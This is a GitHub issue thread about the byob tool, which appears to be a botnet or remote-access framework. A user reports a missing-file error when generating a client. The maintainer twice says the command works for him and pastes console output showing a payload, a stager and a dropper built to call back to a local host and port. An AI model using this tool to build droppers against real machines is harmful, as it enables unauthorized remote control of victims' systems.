### ISSUE TITLE
byob stager issues 

### ISSUE THREAD

**Issue by l10000000n11000000b01000000** [malwaredllc/byob#446]
C:\Users\0000\Downloads\byob-master\byob-master\byob>python ./client.py --name newClient.py  192.168.8.112 8886

88                                  88
88                                  88
88                                  88
88,dPPYba,  8b       d8  ,adPPYba,  88,dPPYba,
88P'    "8a `8b     d8' a8"     "8a 88P'    "8a
88       d8  `8b   d8'  8b       d8 88       d8
88b,   ,a8"   `8b,d8'   "8a,   ,a8" 88b,   ,a8"
8Y"Ybbd8"'      Y88'     `"YbbdP"'  8Y"Ybbd8"'
                d8'
               d8'

[>] Modules
        Adding modules...  (4 modules added to client)

[>] Imports
        Adding imports... (32 imports from 4 modules)

[>] Payload
        Uploading payload...  (hosting payload at: http://192.168.8.112:8887//clients/payloads/ysw.py)

[>] Stager
Traceback (most recent call last):
  File "C:\Users\0000\Downloads\byob-master\byob-master\byob\client.py", line 486, in <module>
    main()
  File "C:\Users\0000\Downloads\byob-master\byob-master\byob\client.py", line 197, in main
    stager  = _stager (options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=payload)
  File "C:\Users\0000\Downloads\byob-master\byob-master\byob\client.py", line 373, in _stager
    stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'])
FileNotFoundError: [Errno 2] No such file or directory: 'core/stagers.py'

**Comment by malwaredllc** [comment]
I ran the same command from the same directory and it worked. I was unable to replicate the issue. This is likely due to an issue with your local setup.

```
Mac-6003088bc45e:byob dvm$ python ./client.py --name newClient.py 192.168.8.112 8886


88                                  88
88                                  88
88                                  88
88,dPPYba,  8b       d8  ,adPPYba,  88,dPPYba,
88P'    "8a `8b     d8' a8"     "8a 88P'    "8a
88       d8  `8b   d8'  8b       d8 88       d8
88b,   ,a8"   `8b,d8'   "8a,   ,a8" 88b,   ,a8"
8Y"Ybbd8"'      Y88'     `"YbbdP"'  8Y"Ybbd8"'
                d8'
               d8'


[>] Modules
	Adding modules...  -(4 modules added to client)

[>] Imports
	Adding imports... -(31 imports from 4 modules)

[>] Payload
	Uploading payload...  -(hosting payload at: http://192.168.8.112:8887/clients/payloads/u0K.py)

[>] Stager
	Uploading stager...  -(hosting stager at: http://192.168.8.112:8887/clients/stagers/u0K.py)

[>] Dropper
	Writing dropper... (354 bytes written to /modules/clients/droppers/newClient.py)
```

**Comment by malwaredllc** [comment]
I ran the same command from the same directory as shown in your post, and it worked just fine. I was unable to reproduce this issue. It is likely due to a configuration issue with your local box.
